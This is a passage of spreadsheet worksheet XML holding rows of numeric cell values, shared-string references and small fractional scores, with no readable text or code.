      <c r="B18625" s="2">
        <v>5.4591414E7</v>
      </c>
      <c r="C18625" s="2" t="s">
        <v>17949</v>
      </c>
      <c r="D18625" s="2">
        <v>1.0</v>
      </c>
      <c r="E18625" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18625" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="18626" ht="15.75" customHeight="1">
      <c r="A18626" s="1">
        <v>10756.0</v>
      </c>
      <c r="B18626" s="2">
        <v>1.5509227E7</v>
      </c>
      <c r="C18626" s="2" t="s">
        <v>17950</v>
      </c>
      <c r="D18626" s="2">
        <v>1.0</v>
      </c>
      <c r="E18626" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18626" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="18627" ht="15.75" customHeight="1">
      <c r="A18627" s="1">
        <v>23170.0</v>
      </c>
      <c r="B18627" s="2">
        <v>5.2113126E7</v>
      </c>
      <c r="C18627" s="2" t="s">
        <v>17951</v>
      </c>
      <c r="D18627" s="2">
        <v>1.0</v>
      </c>
      <c r="E18627" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18627" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="18628" ht="15.75" customHeight="1">
      <c r="A18628" s="1">
        <v>25385.0</v>
      </c>
      <c r="B18628" s="2">
        <v>1.3668444E7</v>
      </c>
      <c r="C18628" s="2" t="s">
        <v>17952</v>
      </c>
      <c r="D18628" s="2">
        <v>1.0</v>
      </c>
      <c r="E18628" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18628" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="18629" ht="15.75" customHeight="1">
      <c r="A18629" s="1">
        <v>25790.0</v>
      </c>
      <c r="B18629" s="2">
        <v>1.4674387E7</v>
      </c>
      <c r="C18629" s="2" t="s">
        <v>17953</v>
      </c>
      <c r="D18629" s="2">
        <v>1.0</v>
      </c>
      <c r="E18629" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18629" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="18630" ht="15.75" customHeight="1">
      <c r="A18630" s="1">
        <v>1442.0</v>
      </c>
      <c r="B18630" s="2">
        <v>2.6719509E7</v>
      </c>
      <c r="C18630" s="2" t="s">
        <v>17954</v>
      </c>
      <c r="D18630" s="2">
        <v>1.0</v>
      </c>
      <c r="E18630" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18630" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="18631" ht="15.75" customHeight="1">
      <c r="A18631" s="1">
        <v>7485.0</v>
      </c>
      <c r="B18631" s="2">
        <v>5.1365158E7</v>
      </c>
      <c r="C18631" s="2" t="s">
        <v>17955</v>
      </c>
      <c r="D18631" s="2">
        <v>1.0</v>
      </c>
      <c r="E18631" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18631" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="18632" ht="15.75" customHeight="1">
      <c r="A18632" s="1">
        <v>11667.0</v>
      </c>
      <c r="B18632" s="2">
        <v>2.3371146E7</v>
      </c>
      <c r="C18632" s="2" t="s">
        <v>17956</v>
      </c>
      <c r="D18632" s="2">
        <v>1.0</v>
      </c>
      <c r="E18632" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18632" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="18633" ht="15.75" customHeight="1">
      <c r="A18633" s="1">
        <v>8732.0</v>
      </c>
      <c r="B18633" s="2">
        <v>5.4524225E7</v>
      </c>
      <c r="C18633" s="2" t="s">
        <v>17957</v>
      </c>
      <c r="D18633" s="2">
        <v>1.0</v>
      </c>
      <c r="E18633" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18633" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="18634" ht="15.75" customHeight="1">
      <c r="A18634" s="1">
        <v>11384.0</v>
      </c>
      <c r="B18634" s="2">
        <v>2.1488299E7</v>
      </c>
      <c r="C18634" s="2" t="s">
        <v>17958</v>
      </c>
      <c r="D18634" s="2">
        <v>1.0</v>
      </c>
      <c r="E18634" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18634" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="18635" ht="15.75" customHeight="1">
      <c r="A18635" s="1">
        <v>16802.0</v>
      </c>
      <c r="B18635" s="2">
        <v>4.7783556E7</v>
      </c>
      <c r="C18635" s="2" t="s">
        <v>17959</v>
      </c>
      <c r="D18635" s="2">
        <v>1.0</v>
      </c>
      <c r="E18635" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18635" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="18636" ht="15.75" customHeight="1">
      <c r="A18636" s="1">
        <v>20999.0</v>
      </c>
      <c r="B18636" s="2">
        <v>1.7164199E7</v>
      </c>
      <c r="C18636" s="2" t="s">
        <v>17960</v>
      </c>
      <c r="D18636" s="2">
        <v>1.0</v>
      </c>
      <c r="E18636" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18636" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="18637" ht="15.75" customHeight="1">
      <c r="A18637" s="1">
        <v>32319.0</v>
      </c>
      <c r="B18637" s="2">
        <v>5575500.0</v>
      </c>
      <c r="C18637" s="2" t="s">
        <v>17961</v>
      </c>
      <c r="D18637" s="2">
        <v>1.0</v>
      </c>
      <c r="E18637" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18637" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="18638" ht="15.75" customHeight="1">
      <c r="A18638" s="1">
        <v>22920.0</v>
      </c>
      <c r="B18638" s="2">
        <v>4.8362935E7</v>
      </c>
      <c r="C18638" s="2" t="s">
        <v>17962</v>
      </c>
      <c r="D18638" s="2">
        <v>1.0</v>
      </c>
      <c r="E18638" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18638" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="18639" ht="15.75" customHeight="1">
      <c r="A18639" s="1">
        <v>28535.0</v>
      </c>
      <c r="B18639" s="2">
        <v>2.6796949E7</v>
      </c>
      <c r="C18639" s="2" t="s">
        <v>17963</v>
      </c>
      <c r="D18639" s="2">
        <v>1.0</v>
      </c>
      <c r="E18639" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18639" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="18640" ht="15.75" customHeight="1">
      <c r="A18640" s="1">
        <v>5700.0</v>
      </c>
      <c r="B18640" s="2">
        <v>4.6511496E7</v>
      </c>
      <c r="C18640" s="2" t="s">
        <v>17964</v>
      </c>
      <c r="D18640" s="2">
        <v>1.0</v>
      </c>
      <c r="E18640" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18640" s="2">
        <v>0.1014957264957264</v>
      </c>
    </row>
    <row r="18641" ht="15.75" customHeight="1">
      <c r="A18641" s="1">
        <v>5810.0</v>
      </c>
      <c r="B18641" s="2">
        <v>4.6819831E7</v>
      </c>
      <c r="C18641" s="2" t="s">
        <v>17965</v>
      </c>
      <c r="D18641" s="2">
        <v>1.0</v>
      </c>
      <c r="E18641" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18641" s="2">
        <v>0.1014957264957264</v>
      </c>
    </row>
    <row r="18642" ht="15.75" customHeight="1">
      <c r="A18642" s="1">
        <v>7719.0</v>
      </c>
      <c r="B18642" s="2">
        <v>5.2020976E7</v>
      </c>
      <c r="C18642" s="2" t="s">
        <v>17966</v>
      </c>
      <c r="D18642" s="2">
        <v>1.0</v>
      </c>
      <c r="E18642" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18642" s="2">
        <v>0.1014957264957264</v>
      </c>
    </row>
    <row r="18643" ht="15.75" customHeight="1">
      <c r="A18643" s="1">
        <v>30051.0</v>
      </c>
      <c r="B18643" s="2">
        <v>3625090.0</v>
      </c>
      <c r="C18643" s="2" t="s">
        <v>17967</v>
      </c>
      <c r="D18643" s="2">
        <v>1.0</v>
      </c>
      <c r="E18643" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18643" s="2">
        <v>0.1014957264957264</v>
      </c>
    </row>
    <row r="18644" ht="15.75" customHeight="1">
      <c r="A18644" s="1">
        <v>31085.0</v>
      </c>
      <c r="B18644" s="2">
        <v>4.8362934E7</v>
      </c>
      <c r="C18644" s="2" t="s">
        <v>17962</v>
      </c>
      <c r="D18644" s="2">
        <v>1.0</v>
      </c>
      <c r="E18644" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18644" s="2">
        <v>0.1014957264957264</v>
      </c>
    </row>
    <row r="18645" ht="15.75" customHeight="1">
      <c r="A18645" s="1">
        <v>1258.0</v>
      </c>
      <c r="B18645" s="2">
        <v>2.5207648E7</v>
      </c>
      <c r="C18645" s="2" t="s">
        <v>17968</v>
      </c>
      <c r="D18645" s="2">
        <v>1.0</v>
      </c>
      <c r="E18645" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18645" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18646" ht="15.75" customHeight="1">
      <c r="A18646" s="1">
        <v>1388.0</v>
      </c>
      <c r="B18646" s="2">
        <v>2.6191571E7</v>
      </c>
      <c r="C18646" s="2" t="s">
        <v>17969</v>
      </c>
      <c r="D18646" s="2">
        <v>1.0</v>
      </c>
      <c r="E18646" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18646" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18647" ht="15.75" customHeight="1">
      <c r="A18647" s="1">
        <v>1607.0</v>
      </c>
      <c r="B18647" s="2">
        <v>2.7815067E7</v>
      </c>
      <c r="C18647" s="2" t="s">
        <v>17970</v>
      </c>
      <c r="D18647" s="2">
        <v>1.0</v>
      </c>
      <c r="E18647" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18647" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18648" ht="15.75" customHeight="1">
      <c r="A18648" s="1">
        <v>1792.0</v>
      </c>
      <c r="B18648" s="2">
        <v>2.9134786E7</v>
      </c>
      <c r="C18648" s="2" t="s">
        <v>17971</v>
      </c>
      <c r="D18648" s="2">
        <v>1.0</v>
      </c>
      <c r="E18648" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18648" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18649" ht="15.75" customHeight="1">
      <c r="A18649" s="1">
        <v>2084.0</v>
      </c>
      <c r="B18649" s="2">
        <v>3.1170474E7</v>
      </c>
      <c r="C18649" s="2" t="s">
        <v>17972</v>
      </c>
      <c r="D18649" s="2">
        <v>1.0</v>
      </c>
      <c r="E18649" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18649" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18650" ht="15.75" customHeight="1">
      <c r="A18650" s="1">
        <v>2142.0</v>
      </c>
      <c r="B18650" s="2">
        <v>3.1615721E7</v>
      </c>
      <c r="C18650" s="2" t="s">
        <v>17973</v>
      </c>
      <c r="D18650" s="2">
        <v>1.0</v>
      </c>
      <c r="E18650" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18650" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18651" ht="15.75" customHeight="1">
      <c r="A18651" s="1">
        <v>2765.0</v>
      </c>
      <c r="B18651" s="2">
        <v>3.5110311E7</v>
      </c>
      <c r="C18651" s="2" t="s">
        <v>17974</v>
      </c>
      <c r="D18651" s="2">
        <v>1.0</v>
      </c>
      <c r="E18651" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18651" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18652" ht="15.75" customHeight="1">
      <c r="A18652" s="1">
        <v>3372.0</v>
      </c>
      <c r="B18652" s="2">
        <v>3.7913208E7</v>
      </c>
      <c r="C18652" s="2" t="s">
        <v>17975</v>
      </c>
      <c r="D18652" s="2">
        <v>1.0</v>
      </c>
      <c r="E18652" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18652" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18653" ht="15.75" customHeight="1">
      <c r="A18653" s="1">
        <v>3528.0</v>
      </c>
      <c r="B18653" s="2">
        <v>3.8617174E7</v>
      </c>
      <c r="C18653" s="2" t="s">
        <v>17976</v>
      </c>
      <c r="D18653" s="2">
        <v>1.0</v>
      </c>
      <c r="E18653" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18653" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18654" ht="15.75" customHeight="1">
      <c r="A18654" s="1">
        <v>3545.0</v>
      </c>
      <c r="B18654" s="2">
        <v>3.8713818E7</v>
      </c>
      <c r="C18654" s="2" t="s">
        <v>17977</v>
      </c>
      <c r="D18654" s="2">
        <v>1.0</v>
      </c>
      <c r="E18654" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18654" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18655" ht="15.75" customHeight="1">
      <c r="A18655" s="1">
        <v>3839.0</v>
      </c>
      <c r="B18655" s="2">
        <v>4.0204367E7</v>
      </c>
      <c r="C18655" s="2" t="s">
        <v>17978</v>
      </c>
      <c r="D18655" s="2">
        <v>1.0</v>
      </c>
      <c r="E18655" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18655" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18656" ht="15.75" customHeight="1">
      <c r="A18656" s="1">
        <v>3958.0</v>
      </c>
      <c r="B18656" s="2">
        <v>4.0702893E7</v>
      </c>
      <c r="C18656" s="2" t="s">
        <v>17979</v>
      </c>
      <c r="D18656" s="2">
        <v>1.0</v>
      </c>
      <c r="E18656" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18656" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18657" ht="15.75" customHeight="1">
      <c r="A18657" s="1">
        <v>4201.0</v>
      </c>
      <c r="B18657" s="2">
        <v>4.1644088E7</v>
      </c>
      <c r="C18657" s="2" t="s">
        <v>17980</v>
      </c>
      <c r="D18657" s="2">
        <v>1.0</v>
      </c>
      <c r="E18657" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18657" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18658" ht="15.75" customHeight="1">
      <c r="A18658" s="1">
        <v>5613.0</v>
      </c>
      <c r="B18658" s="2">
        <v>4.6174307E7</v>
      </c>
      <c r="C18658" s="2" t="s">
        <v>17981</v>
      </c>
      <c r="D18658" s="2">
        <v>1.0</v>
      </c>
      <c r="E18658" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18658" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18659" ht="15.75" customHeight="1">
      <c r="A18659" s="1">
        <v>5749.0</v>
      </c>
      <c r="B18659" s="2">
        <v>4.6644912E7</v>
      </c>
      <c r="C18659" s="2" t="s">
        <v>17982</v>
      </c>
      <c r="D18659" s="2">
        <v>1.0</v>
      </c>
      <c r="E18659" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18659" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18660" ht="15.75" customHeight="1">
      <c r="A18660" s="1">
        <v>6216.0</v>
      </c>
      <c r="B18660" s="2">
        <v>4.8011604E7</v>
      </c>
      <c r="C18660" s="2" t="s">
        <v>17983</v>
      </c>
      <c r="D18660" s="2">
        <v>1.0</v>
      </c>
      <c r="E18660" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18660" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18661" ht="15.75" customHeight="1">
      <c r="A18661" s="1">
        <v>6421.0</v>
      </c>
      <c r="B18661" s="2">
        <v>4.8549769E7</v>
      </c>
      <c r="C18661" s="2" t="s">
        <v>17984</v>
      </c>
      <c r="D18661" s="2">
        <v>1.0</v>
      </c>
      <c r="E18661" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18661" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18662" ht="15.75" customHeight="1">
      <c r="A18662" s="1">
        <v>6475.0</v>
      </c>
      <c r="B18662" s="2">
        <v>4.866475E7</v>
      </c>
      <c r="C18662" s="2" t="s">
        <v>17985</v>
      </c>
      <c r="D18662" s="2">
        <v>1.0</v>
      </c>
      <c r="E18662" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18662" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18663" ht="15.75" customHeight="1">
      <c r="A18663" s="1">
        <v>6546.0</v>
      </c>
      <c r="B18663" s="2">
        <v>4.8854031E7</v>
      </c>
      <c r="C18663" s="2" t="s">
        <v>17986</v>
      </c>
      <c r="D18663" s="2">
        <v>1.0</v>
      </c>
      <c r="E18663" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18663" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18664" ht="15.75" customHeight="1">
      <c r="A18664" s="1">
        <v>7180.0</v>
      </c>
      <c r="B18664" s="2">
        <v>5.0564107E7</v>
      </c>
      <c r="C18664" s="2" t="s">
        <v>17987</v>
      </c>
      <c r="D18664" s="2">
        <v>1.0</v>
      </c>
      <c r="E18664" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18664" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18665" ht="15.75" customHeight="1">
      <c r="A18665" s="1">
        <v>7329.0</v>
      </c>
      <c r="B18665" s="2">
        <v>5.0905338E7</v>
      </c>
      <c r="C18665" s="2" t="s">
        <v>17988</v>
      </c>
      <c r="D18665" s="2">
        <v>1.0</v>
      </c>
      <c r="E18665" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18665" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18666" ht="15.75" customHeight="1">
      <c r="A18666" s="1">
        <v>7512.0</v>
      </c>
      <c r="B18666" s="2">
        <v>5.1404468E7</v>
      </c>
      <c r="C18666" s="2" t="s">
        <v>17989</v>
      </c>
      <c r="D18666" s="2">
        <v>1.0</v>
      </c>
      <c r="E18666" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18666" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18667" ht="15.75" customHeight="1">
      <c r="A18667" s="1">
        <v>8298.0</v>
      </c>
      <c r="B18667" s="2">
        <v>5.3549339E7</v>
      </c>
      <c r="C18667" s="2" t="s">
        <v>17990</v>
      </c>
      <c r="D18667" s="2">
        <v>1.0</v>
      </c>
      <c r="E18667" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18667" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18668" ht="15.75" customHeight="1">
      <c r="A18668" s="1">
        <v>8764.0</v>
      </c>
      <c r="B18668" s="2">
        <v>5.4575747E7</v>
      </c>
      <c r="C18668" s="2" t="s">
        <v>17991</v>
      </c>
      <c r="D18668" s="2">
        <v>1.0</v>
      </c>
      <c r="E18668" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18668" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18669" ht="15.75" customHeight="1">
      <c r="A18669" s="1">
        <v>8904.0</v>
      </c>
      <c r="B18669" s="2">
        <v>5.4795425E7</v>
      </c>
      <c r="C18669" s="2" t="s">
        <v>17992</v>
      </c>
      <c r="D18669" s="2">
        <v>1.0</v>
      </c>
      <c r="E18669" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18669" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18670" ht="15.75" customHeight="1">
      <c r="A18670" s="1">
        <v>8969.0</v>
      </c>
      <c r="B18670" s="2">
        <v>5.4950989E7</v>
      </c>
      <c r="C18670" s="2" t="s">
        <v>17993</v>
      </c>
      <c r="D18670" s="2">
        <v>1.0</v>
      </c>
      <c r="E18670" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18670" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18671" ht="15.75" customHeight="1">
      <c r="A18671" s="1">
        <v>9534.0</v>
      </c>
      <c r="B18671" s="2">
        <v>5.5987566E7</v>
      </c>
      <c r="C18671" s="2" t="s">
        <v>17994</v>
      </c>
      <c r="D18671" s="2">
        <v>1.0</v>
      </c>
      <c r="E18671" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18671" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18672" ht="15.75" customHeight="1">
      <c r="A18672" s="1">
        <v>9961.0</v>
      </c>
      <c r="B18672" s="2">
        <v>5.6926975E7</v>
      </c>
      <c r="C18672" s="2" t="s">
        <v>17995</v>
      </c>
      <c r="D18672" s="2">
        <v>1.0</v>
      </c>
      <c r="E18672" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18672" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18673" ht="15.75" customHeight="1">
      <c r="A18673" s="1">
        <v>10419.0</v>
      </c>
      <c r="B18673" s="2">
        <v>1.013625E7</v>
      </c>
      <c r="C18673" s="2" t="s">
        <v>17996</v>
      </c>
      <c r="D18673" s="2">
        <v>1.0</v>
      </c>
      <c r="E18673" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18673" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18674" ht="15.75" customHeight="1">
      <c r="A18674" s="1">
        <v>10433.0</v>
      </c>
      <c r="B18674" s="2">
        <v>1.0337775E7</v>
      </c>
      <c r="C18674" s="2" t="s">
        <v>17997</v>
      </c>
      <c r="D18674" s="2">
        <v>1.0</v>
      </c>
      <c r="E18674" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18674" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18675" ht="15.75" customHeight="1">
      <c r="A18675" s="1">
        <v>10606.0</v>
      </c>
      <c r="B18675" s="2">
        <v>1.3672052E7</v>
      </c>
      <c r="C18675" s="2" t="s">
        <v>17998</v>
      </c>
      <c r="D18675" s="2">
        <v>1.0</v>
      </c>
      <c r="E18675" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18675" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18676" ht="15.75" customHeight="1">
      <c r="A18676" s="1">
        <v>10697.0</v>
      </c>
      <c r="B18676" s="2">
        <v>1.4828145E7</v>
      </c>
      <c r="C18676" s="2" t="s">
        <v>17999</v>
      </c>
      <c r="D18676" s="2">
        <v>1.0</v>
      </c>
      <c r="E18676" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18676" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18677" ht="15.75" customHeight="1">
      <c r="A18677" s="1">
        <v>10853.0</v>
      </c>
      <c r="B18677" s="2">
        <v>1.6217404E7</v>
      </c>
      <c r="C18677" s="2" t="s">
        <v>18000</v>
      </c>
      <c r="D18677" s="2">
        <v>1.0</v>
      </c>
      <c r="E18677" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18677" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18678" ht="15.75" customHeight="1">
      <c r="A18678" s="1">
        <v>10984.0</v>
      </c>
      <c r="B18678" s="2">
        <v>1.7385544E7</v>
      </c>
      <c r="C18678" s="2" t="s">
        <v>18001</v>
      </c>
      <c r="D18678" s="2">
        <v>1.0</v>
      </c>
      <c r="E18678" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18678" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18679" ht="15.75" customHeight="1">
      <c r="A18679" s="1">
        <v>11139.0</v>
      </c>
      <c r="B18679" s="2">
        <v>1.9261497E7</v>
      </c>
      <c r="C18679" s="2" t="s">
        <v>18002</v>
      </c>
      <c r="D18679" s="2">
        <v>1.0</v>
      </c>
      <c r="E18679" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18679" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18680" ht="15.75" customHeight="1">
      <c r="A18680" s="1">
        <v>11157.0</v>
      </c>
      <c r="B18680" s="2">
        <v>1.9465262E7</v>
      </c>
      <c r="C18680" s="2" t="s">
        <v>18003</v>
      </c>
      <c r="D18680" s="2">
        <v>1.0</v>
      </c>
      <c r="E18680" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18680" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18681" ht="15.75" customHeight="1">
      <c r="A18681" s="1">
        <v>11291.0</v>
      </c>
      <c r="B18681" s="2">
        <v>2.0916937E7</v>
      </c>
      <c r="C18681" s="2" t="s">
        <v>18004</v>
      </c>
      <c r="D18681" s="2">
        <v>1.0</v>
      </c>
      <c r="E18681" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18681" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18682" ht="15.75" customHeight="1">
      <c r="A18682" s="1">
        <v>11387.0</v>
      </c>
      <c r="B18682" s="2">
        <v>2.1510805E7</v>
      </c>
      <c r="C18682" s="2" t="s">
        <v>18005</v>
      </c>
      <c r="D18682" s="2">
        <v>1.0</v>
      </c>
      <c r="E18682" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18682" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18683" ht="15.75" customHeight="1">
      <c r="A18683" s="1">
        <v>12577.0</v>
      </c>
      <c r="B18683" s="2">
        <v>3.0011107E7</v>
      </c>
      <c r="C18683" s="2" t="s">
        <v>18006</v>
      </c>
      <c r="D18683" s="2">
        <v>1.0</v>
      </c>
      <c r="E18683" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18683" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18684" ht="15.75" customHeight="1">
      <c r="A18684" s="1">
        <v>12602.0</v>
      </c>
      <c r="B18684" s="2">
        <v>3.0083305E7</v>
      </c>
      <c r="C18684" s="2" t="s">
        <v>18007</v>
      </c>
      <c r="D18684" s="2">
        <v>1.0</v>
      </c>
      <c r="E18684" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18684" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18685" ht="15.75" customHeight="1">
      <c r="A18685" s="1">
        <v>12731.0</v>
      </c>
      <c r="B18685" s="2">
        <v>3.1009673E7</v>
      </c>
      <c r="C18685" s="2" t="s">
        <v>18008</v>
      </c>
      <c r="D18685" s="2">
        <v>1.0</v>
      </c>
      <c r="E18685" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18685" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18686" ht="15.75" customHeight="1">
      <c r="A18686" s="1">
        <v>12867.0</v>
      </c>
      <c r="B18686" s="2">
        <v>3.1905403E7</v>
      </c>
      <c r="C18686" s="2" t="s">
        <v>18009</v>
      </c>
      <c r="D18686" s="2">
        <v>1.0</v>
      </c>
      <c r="E18686" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18686" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18687" ht="15.75" customHeight="1">
      <c r="A18687" s="1">
        <v>14223.0</v>
      </c>
      <c r="B18687" s="2">
        <v>3.8283999E7</v>
      </c>
      <c r="C18687" s="2" t="s">
        <v>18010</v>
      </c>
      <c r="D18687" s="2">
        <v>1.0</v>
      </c>
      <c r="E18687" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18687" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18688" ht="15.75" customHeight="1">
      <c r="A18688" s="1">
        <v>14296.0</v>
      </c>
      <c r="B18688" s="2">
        <v>3.8572072E7</v>
      </c>
      <c r="C18688" s="2" t="s">
        <v>18011</v>
      </c>
      <c r="D18688" s="2">
        <v>1.0</v>
      </c>
      <c r="E18688" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18688" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18689" ht="15.75" customHeight="1">
      <c r="A18689" s="1">
        <v>14779.0</v>
      </c>
      <c r="B18689" s="2">
        <v>4.0883405E7</v>
      </c>
      <c r="C18689" s="2" t="s">
        <v>18012</v>
      </c>
      <c r="D18689" s="2">
        <v>1.0</v>
      </c>
      <c r="E18689" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18689" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18690" ht="15.75" customHeight="1">
      <c r="A18690" s="1">
        <v>16232.0</v>
      </c>
      <c r="B18690" s="2">
        <v>4.5740461E7</v>
      </c>
      <c r="C18690" s="2" t="s">
        <v>18013</v>
      </c>
      <c r="D18690" s="2">
        <v>1.0</v>
      </c>
      <c r="E18690" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18690" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18691" ht="15.75" customHeight="1">
      <c r="A18691" s="1">
        <v>16242.0</v>
      </c>
      <c r="B18691" s="2">
        <v>4.5771669E7</v>
      </c>
      <c r="C18691" s="2" t="s">
        <v>18014</v>
      </c>
      <c r="D18691" s="2">
        <v>1.0</v>
      </c>
      <c r="E18691" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18691" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18692" ht="15.75" customHeight="1">
      <c r="A18692" s="1">
        <v>16606.0</v>
      </c>
